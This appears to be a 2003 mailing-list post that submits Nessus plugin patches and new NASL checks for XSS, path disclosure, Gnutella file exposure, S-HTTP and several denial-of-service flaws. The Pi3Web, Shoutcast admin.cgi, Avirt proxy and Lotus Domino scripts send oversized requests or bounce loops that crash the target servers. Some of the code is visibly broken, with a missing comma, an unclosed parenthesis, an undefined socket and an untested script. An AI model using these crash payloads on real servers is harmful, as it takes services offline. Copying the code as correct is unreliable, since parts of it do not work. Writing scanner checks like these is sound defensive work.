Should I commit some of these in the CVS repository? --- nessus-plugins/scripts/cross_site_scripting.nasl 24 Mar 2003 18:29:12 -0000 1.13 +++ nessus-plugins/scripts/cross_site_scripting.nasl 6 May 2003 07:46:21 -0000 @@ -6,8 +6,16 @@ # false positive fix by Andrew Hintz - http://guh.nu - 1.3.2002 # Update by rd: thanks to Andrew's remarks, HTTP headers are discared # Update by Chris Sullo - sqat_private - 06/27/2002 -- added .cfm test +# Update by Michel Arboi - arboiat_private - 2002-05-04 -- added "dir part" # # Covers BID 5305 / CVE CAN-2002-1060 +# +# References: +# Date: Fri, 2 Feb 2001 07:50:45 -0500 +# From: twi252at_private +# Subject: WebSphere - Minor CSS Issue. +# To: BUGTRAQat_private +# if (description) { @@ -58,38 +66,36 @@ port = get_kb_item("Services/www"); if(!port)port = 80; +if(! get_port_state(port)) exit(0); -dir[0] = ".jsp"; -dir[1] = ".shtml"; -dir[2] = ".thtml"; -dir[3] = ".cfm"; -dir[4] = ""; +# 2002-05-04 (MA) I added /../ because some servers are vulnerable to it +# e.g. IBM_HTTP_Server/1.3.6.3 Apache/1.3.7-dev +# While I was here, I added /? too because IIRC, tis might work -if(get_port_state(port)) -{ - for (i = 0; dir[i] ; i = i + 1) +dirs = make_list("/", "/../", "/?"); +exts = make_list(".jsp", ".shtml", ".thtml", ".cfm", ""); + +confirmtext = string("<SCRIPT>alert('Vulnerable')</SCRIPT>"); + +foreach d (dirs) + foreach e (exts) { soc = http_open_socket(port); - if(soc) - { - url = string("/<SCRIPT>alert('Vulnerable')</SCRIPT>", dir[i]); + if(! soc) exit(0); + + url = string(d, "<SCRIPT>alert('Vulnerable')</SCRIPT>", e); - confirmtext = string("<SCRIPT>alert('Vulnerable')</SCRIPT>"); req = http_get(item:url, port:port); send(socket:soc, data:req); head = http_recv_headers(soc); r = http_recv(socket:soc); http_close_socket(soc); - if(confirmtext >< r) { security_warning(port); exit(0); } } - else exit(0); - } -} - + --- nessus-plugins/scripts/http_func.inc 7 Apr 2003 10:40:40 -0000 1.43 +++ nessus-plugins/scripts/http_func.inc 6 May 2003 07:46:21 -0000 @@ -297,4 +297,30 @@ return(kb); } +function locate_cgi(port, item) +{ + local_var k1, k, u, cgis, c, name; + + item = tolower(item); + k1 = string("/tmp/cgi/", port, "/", item); + u = get_kb_item(k1); + if (u) return u; + k = string("www/", port, "/cgis"); + cgis = get_kb_list(k); + if (! isnull(cgis)) + foreach c (cgis) + { + u = ereg_replace(string: c, pattern: " +- .*", replace: ""); + name = ereg_replace(string: u, pattern: "([^/]*)$", replace: "\1"); + name = tolower(name); + if (name == item) + { + set_kb_item(name: k1, item: u); + return u; + } + } + #foreach c (cgi_dirs()) + # TBD + return; # NULL +} --- nessus-plugins/scripts/pi3web_dos.nasl 14 Sep 2002 19:12:22 -0000 1.3 +++ nessus-plugins/scripts/pi3web_dos.nasl 6 May 2003 07:46:21 -0000 @@ -1,7 +1,6 @@ # # This script was written by Renaud Deraison <deraisonat_private> -# -# +# Michel Arboi added the DoS code (I love DoS) # # See the Nessus Scripts License for details # @@ -9,6 +8,12 @@ # # Refs: http://online.securityfocus.com/archive/1/250126 # +# From: "Tamer Sahin" <tsat_private> +# To: bugtraqat_private +# Subject: Pi3Web Webserver v2.0 Buffer Overflow Vulnerability +# Date: Mon, 14 Jan 2002 01:00:39 +0200 +# Affiliation: http://www.securityoffice.net +# if(description) { @@ -40,7 +45,7 @@ script_summary(english:summary["english"]); # Category - script_category(ACT_GATHER_INFO); + script_category(ACT_MIXED_ATTACK); # Dependencie(s) script_dependencie("find_service.nes", "http_version.nasl"); @@ -64,12 +69,32 @@ port = get_kb_item("Services/www"); if(!port) port = 80; - +if (safe_checks()) +{ banner = get_http_banner(port:port); if(banner) { if(egrep(pattern:"^Server: Pi3Web/2\.0\.0", string:banner)) security_hole(port); } + exit(0); +} + +if (http_is_dead(port: port)) exit(0); +cgi = locate_cgi(port: port, item: "hello.exe"); +if (isnull(cgi)) exit(0); + +req = http_get(port: port, item: strcat(cgi, "?", crap(224))); + +for (i = 0; i < 5; i ++) # is 5 enough? +{ + soc = http_open_socket(port); + if (! soc) break; + send(socket: soc, data: req); + r = http_recv(socket: soc); + http_close_socket(soc); +} + +if (http_is_dead(port: port)) security_hole(port); --- nessus-plugins/scripts/savant_cgitest.nasl 1 May 2003 22:10:23 -0000 1.6 +++ nessus-plugins/scripts/savant_cgitest.nasl 6 May 2003 07:46:21 -0000 @@ -68,8 +68,8 @@ if (! soc) exit(0); len = 256; # 136 should be enough - req = string("POST /cgi-bin/cgitest.exe HTTP/1.0\r\nContent-Length: ", len, + req = string("POST ", p " HTTP/1.0\r\nContent-Length: ", len, "\r\n\r\n", crap(len), "\r\n"); send(socket:soc, data:req); http_close_socket(soc); --- nessus-plugins/scripts/smtp_func.inc 7 Apr 2003 10:40:40 -0000 1.18 +++ nessus-plugins/scripts/smtp_func.inc 6 May 2003 07:46:21 -0000 @@ -10,10 +10,12 @@ send(socket: socket, data: string("RSET\r\n")); buff = recv_line(socket: socket, length: 2048); # Here, we might test the return code + if (from !~ ' *<.*> *') from = strcat('<', from, '>'); send(socket: socket, data: string("MAIL FROM: ", from, "\r\n")); buff = recv_line(socket: socket, length: 2048); if (! ereg(pattern:"^2[0-9][0-9] ", string:buff)) { return (0); } + if (to !~ ' *<.*> *') to = strcat('<', to, '>'); send(socket: socket, data: string("RCPT TO: ", to, "\r\n")); buff = recv_line(socket: socket, length: 2048); if (! ereg(pattern:"^2[0-9][0-9] ", string:buff)) { return (0); } # # This script was written by Michel Arboi <arboiat_private> # # # GPL # # Vulnerable servers: # Pi3Web/2.0.0 # # References # Date: 10 Mar 2002 04:23:45 -0000 # From: "Tekno pHReak" <tekat_private> # To: bugtraqat_private # Subject: Pi3Web/2.0.0 File-Disclosure/Path Disclosure vuln # if(description) { script_id(11600); script_version ("$Revision$"); name["english"] = "Pi3web Physical Path Disclosure Vulnerability"; script_name(english:name["english"]); desc["english"] = " Your web server reveals the physical path of the webroot when asked for a non-existent page. if it is incorrectly configured. Whilst printing errors to the output is useful for debugging applications, this feature should not be enabled on production servers. Solution : Upgrade your server or reconfigure it Risk factor : Low"; script_description(english:desc["english"]); summary["english"] = "Tests for pi3web Physical Path Disclosure Vulnerability"; script_summary(english:summary["english"]); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2003 Michel Arboi"); family["english"] = "CGI abuses"; family["francais"] = "Abus de CGI"; script_family(english:family["english"], francais:family["francais"]); script_dependencie("find_service.nes", "no404.nasl"); script_require_ports("Services/www", 80); exit(0); } # include("http_func.inc"); include("http_keepalive.inc"); ext = make_list(".", ".html", ".htm", ".jsp", ".asp", ".shtm", ".shtml", ".php", ".php3", ".php4"); port = get_kb_item("Services/www"); if(! port) port = 80; if(! get_port_state(port)) exit(0); foreach e (ext) { f = string("niet", rand()); req = http_get(item:string("/", f, e), port:port); r = http_keepalive_send_recv(port: port, data: req); if(isnull(r)) exit(0); # Connection refused # Windows-like path if (ereg(string: r, pattern: strcat("[C-H]:(\\\\[A-Za-z0-9_.-])*\\", f, "\\", e)) { security_warning(port); exit(0); } # Unix like path if (ereg(string: r, pattern: strcat("(/[A-Za-z0-9_.+-])+/", f, "/", e))) { security_warning(port); exit(0); } } # # This script was written by Michel Arboi <arboiat_private> # GPL # *untested* # # Cf. RFC 1945 & RFC 2068 # # Vulnerables: # Avirt SOHO v4.2 # Avirt Gateway v4.2 # Avirt Gateway Suite v4.2 # # References: # Date: Thu, 17 Jan 2002 20:23:28 +0100 # From: "Strumpf Noir Society" <vuln-devat_private> # To: bugtraqat_private # Subject: Avirt Proxy Buffer Overflow Vulnerabilities # if(description) { script_id(11605); script_version ("$Revision$"); name["english"] = "Header overflow against HTTP proxy"; script_name(english:name["english"]); desc["english"] = "It was possible to kill the HTTP proxy by sending an invalid request with a too long header A cracker may exploit this vulnerability to make your proxy server crash continually or even execute arbitrary code on your system. Solution : upgrade your software Risk factor : High"; script_description(english:desc["english"]); summary["english"] = "Too long HTTP header kills the HTTP proxy server"; script_summary(english:summary["english"]); script_category(ACT_DESTRUCTIVE_ATTACK); script_copyright(english:"This script is Copyright (C) 2003 Michel Arboi"); family["english"] = "Gain root remotely"; family["francais"] = "Passer root à distance"; script_family(english:family["english"], francais:family["francais"]); script_require_ports("Services/www", 8080); script_dependencie("find_service.nes", "httpver.nasl", "http_version.nasl"); exit(0); } ######## include("http_func.inc"); port = get_kb_item("Services/www"); if(!port) port = 8080; if(! get_port_state(port)) exit(0); if (http_is_dead(port: port)) exit(0); soc = open_sock_tcp(port); if(! soc) exit(0); test_host = "www.nessus.org"; # Change this! headers = make_list( string("From: ", crap(2048), "@", crap(2048), ".org"), string("If-Modified-Since: Sat, 29 Oct 1994 19:43:31 ", crap(data: "GMT", length: 4096)), string("Referer: http://", crap(4096), "/"), # Many other HTTP/1.1 headers... string("If-Unmodified-Since: Sat, 29 Oct 1994 19:43:31 ", crap(data: "GMT", length: 2048)) ); r1 = string("GET http://", test_host, "/", rand(), " HTTP/1.0\r\n"); foreach h (headers) { r = string(r1, h, "\r\n\r\n"); send(socket:soc, data: r); r = http_recv(socket:soc); close(soc); soc = open_sock_tcp(port); if (! soc) { security_hole(port); exit(0); } } close(soc); if (http_is_dead(port: port)) { security_hole(port); exit(0); } # # Copyright 2003 by Michel Arboi <arboiat_private> # # GNU Public Licence # if(description) { script_id(11601); script_version ("$Revision$"); name["english"] = "Misconfigured Gnutella"; script_name(english:name["english"]); script_description(english:desc["english"]); summary["english"] = "Detect sensitive files shared by Gnutella"; script_summary(english:summary["english"]); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2003 Michel Arboi"); family["english"] = "General"; script_family(english:family["english"]); script_dependencie("find_service.nes", "gnutella_detec.nasl"); script_require_ports("Services/gnutella", 6346); exit(0); } # function gnutella_read_data(socket, message) { local_var len, i, r2; len = 0; for (i = 22; i >= 19; i --) len = len * 256 + ord(message[i]); if (len > 0) r2 = recv(socket: soc, length: len); return r2; } function gnutella_search(socket, search) { local_var MsgId, Msg, r1, r2; MsgId = rand_str(length: 16); Msg = raw_string( MsgId, # Message ID 128, # Function ID 1, # TTL 0, # Hops taken strlen(search)+3, 0, 0, 0, # Data length (little endian) 0, 0, # Minimum speed (LE) search, 0); send(socket: socket, data: Msg); # We might get Ping and many other Gnutella-net messages # We just read and drop them, until we get our answer. while (1) { r1 = recv(socket: soc, length: 23); if (strlen(r1) < 23) return; r2 = gnutella_read_data(socket: socket, message: r1); if (ord(r1[16]) == 129 && substr(r1, 0, 15) == MsgId) return r2; } } # include("misc_func.inc"); port = get_kb_item("Services/gnutella"); if (! port) port = 6346; if (! get_port_state(port)) exit(0); soc = open_sock_tcp(port); if (! soc) exit(0); send(socket:soc, data: 'GNUTELLA CONNECT/0.4\n\n'); r = recv(socket: soc, length: 13); if (r != 'GNUTELLA OK\n\n') { security_note(port: port, data: 'This Gnutella servent rejected the connection: ' + r); close(soc); exit(0); } # GTK-Gnutella sends a ping on connection r = recv(socket: soc, length: 23); if (strlen(r) >= 23) { r2 = gnutella_read_data(socket: soc, message: r); if (ord(r[16]) == 0) # Ping { # Pong (phony answer) MsgId = substr(r, 0, 15); ip = this_host(); #display("ip=", ip, "\n"); x = eregmatch(string: ip, pattern: "([0-9]+)\.([0-9]+)\.([0-9]+)\.([0-9]+)"); #display("ip=", x, "\n"); Msg = raw_string( MsgId, 1, # pong 1, # TTL 0, # Hop 14, 0, 0, 0, 11, 11, # Listening port int(x[1]), int(x[2]), int(x[3]), int(x[4]), # IP 1, 1, 0, 0, # File count (little endian) 1, 1, 0, 0); # KB count send(socket: soc, data: Msg); } } dangerous_file = make_list("boot.ini", "win.ini", "autoexec.bat", "config.sys", "io.sys", "msdos.sys", "pagefile.sys", "inetd.conf", "host.conf"); foreach d (dangerous_file) { r = gnutella_search(socket: soc, search: d); if (! isnull(r) && ord(r[0]) > 0) { security_warning(port: port, data: " It seems that your root directory is visible through the Gnutella servent. Confidential files might be exported. Solution : disable this Gnutella servent or configure it correctly Risk factor : High"); close(soc); exit(0); } } close(soc); # # This script was written by Michel Arboi <arboiat_private> # # GPL... # # References # Date: Mon, 20 Aug 2001 21:19:32 +0000 # From: "Ian Gulliver" <ianat_private> # To: bugtraqat_private # Subject: Lotus Domino DoS # if(description) { script_id(11603); script_version ("$Revision$"); name["english"] = "Lotus Domino SMTP bounce DoS"; script_name(english:name["english"]); desc["english"] = " The remote SMTP server (maybe a Lotus Domino) was killed or disabled by a malformed message that bounces to himself. The routing loop exhausts all resources. A cracker may use this to crash it continuously. Solution: Reconfigure your MTA or upgrade it Risk factor : High"; script_description(english:desc["english"]); summary["english"] = "Broken message bounced to himself exhausts MTA"; script_summary(english:summary["english"]); script_category(ACT_DENIAL); script_copyright(english:"This script is Copyright (C) 2003 Michel Arboi"); family["english"] = "Denial of Service"; family["francais"] = "Déni de service"; script_family(english:family["english"], francais:family["francais"]); # Avoid this test if the server relays e-mails. script_dependencie("find_service.nes", "smtp_settings.nasl", "smtp_relay.nasl"); script_exclude_keys("SMTP/spam"); script_require_ports("Services/smtp", 25); exit(0); } # include("smtp_func.inc"); # Disable the test if the server relays e-mails. if (get_kb_item("SMTP/spam")) { #display("lotus_bounce_DoS.nasl disabled on mail relays\n"); exit(0); } # n_sent = 0; fromaddr = string("bounce", rand(), "@[127.0.0.1]"; toaddr = string("nessus", rand(), "@invalid", rand(), ".net"); port = get_kb_item("Services/smtp"); if (!port) port = 25; if(!get_port_state(port))exit(0); buff = smtp_recv_banner(socket:s); b = string("From: nessus\r\nTo: postmast\r\n", "Subject: SMTP bounce denial of service\r\n\r\ntest\r\n"); n = smtp_send_port(port: port, from: fromaddr, to: toaddr, body: b); if (! n) exit(0); sleep(1); flag = 1; soc = open_sock_tcp(port); if (soc) { send(socket: soc, data: string("HELO nessus\r\n")); buff = recv_line(socket: soc, length:2048); if (buff =~ "^2[0-9][0-9] ") flag = 0; send(socket: soc, data: string("QUIT\r\n")); close(soc); } if (flag) security_hole(port); # # This script was written by Michel Arboi <arboiat_private> # # GNU Public LicenceSee the Nessus Scripts License for details # # References: # Date: Mon, 21 Jan 2002 22:04:58 -0800 # From: "Austin Ensminger" <skreamat_private> # Subject: Re: Shoutcast server 1.8.3 win32 # To: bugtraqat_private # # http://www.egoclan.barrysworld.net/sc_crashsvr.txt # # Date: 19 Jan 2002 18:16:49 -0000 # From: "Brian Dittmer" <bdittat_private> # To: bugtraqat_private # Subject: Shoutcast server 1.8.3 win32 # if(description) { script_id(11604); script_version ("$Revision$"); name["english"] = "admin.cgi overflow"; script_name(english:name["english"]); desc["english"] = " The SHoutcast server crashes when a too long argument is given to admin.cgi A cracker may use this flaw to prevent your server from working, or worse, execute arbitrary code on your system. Solution : upgrade Shoutcast to the latest version. Risk factor : Serious"; script_description(english:desc["english"]); summary["english"] = "Overflows admin.cgi"; script_summary(english:summary["english"]); script_category(ACT_MIXED_ATTACK); script_copyright(english:"This script is Copyright (C) 2003 Michel Arboi"); family["english"] = "CGI abuses"; family["francais"] = "Abus de CGI"; script_family(english:family["english"], francais:family["francais"]); script_dependencie("find_service.nes", "no404.nasl"); script_require_ports("Services/www", 8000); # Shoutcast is often on a high port exit(0); } # The script code starts here include("http_func.inc"); include("http_keepalive.inc"); if (safe_checks()) { port = is_cgi_installed("admin.cgi"); if (port) { report = " admin.cgi was detected on this server. Shoutcast server installs a version that is vulnerable to a buffer overflow. ** Note that Nessus did not try to exploit the flaw, ** so this might be a false alert. Solution : upgrade Shoutcast to the latest version. Risk factor : Serious"; security_hole(port: port, data: report); } exit(0); } include("http_func.inc"); port = get_kb_item("Services/www"); if(!port) port = 80; if(!get_port_state(port)) exit(0); if (http_is_dead(port: port)) exit(0); ac = locate_cgi(port: port, item: "admin.cgi"); if (! ac) exit(0); url = string(ac, "?pass=", crap(4096)); req = http_get(item: url, port:port); r = http_keepalive_send_recv(port:port, data:req); url = string(ac, "?", crap(4096)); req = http_get(item: url, port:port); r = http_keepalive_send_recv(port:port, data:req); if (http_is_dead(port: port)) { security_hole(port: port); exit(0); } # This script was written by Michel Arboi <arboiat_private> # # Refereces: # RFC 2660 The Secure HyperText Transfer Protocol # if(description) { script_id(11602); script_version ("$Revision$"); name["english"] = "Detect S-HTTP"; script_name(english:name["english"]); desc["english"] = " This web server supports S-HTTP, a cryptographic layer that was defined in 1999 by RFC 2660. S-HTTP has never been widely implemented and you should use HTTPS instead. As rare or obsolete code is often badly tested, it would be safer to use another server or disable this layer somehow. Risk factor : Low"; script_description(english:desc["english"]); summary["english"] = "Checks if the web server accepts the Secure method"; script_summary(english:summary["english"]); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2003 Michel Arboi"); family["english"] = "General"; family["francais"] = "General"; script_family(english:family["english"], francais:family["francais"]); script_dependencie("find_service.nes", "no404.nasl"); script_require_ports("Services/www", 80); exit(0); } # port = get_kb_item("Services/www"); if (! port) port = 80; if (!get_port_state(port)) exit(0); soc = http_open_socket(port); req = string("Secure * Secure-HTTP/1.4\r\n", "Host: ", get_host_name(), ":", port, "\r\n", "Connection: close\r\n", "\r\n"); send(socket: soc, data: req); r = recv_line(socket: soc, length: 256); http_close_socket(soc); if ('Secure-HTTP/1.4 200 ' >< r) security_warning(port);
This archive was generated by hypermail 2b30 : Tue May 06 2003 - 01:25:19 PDT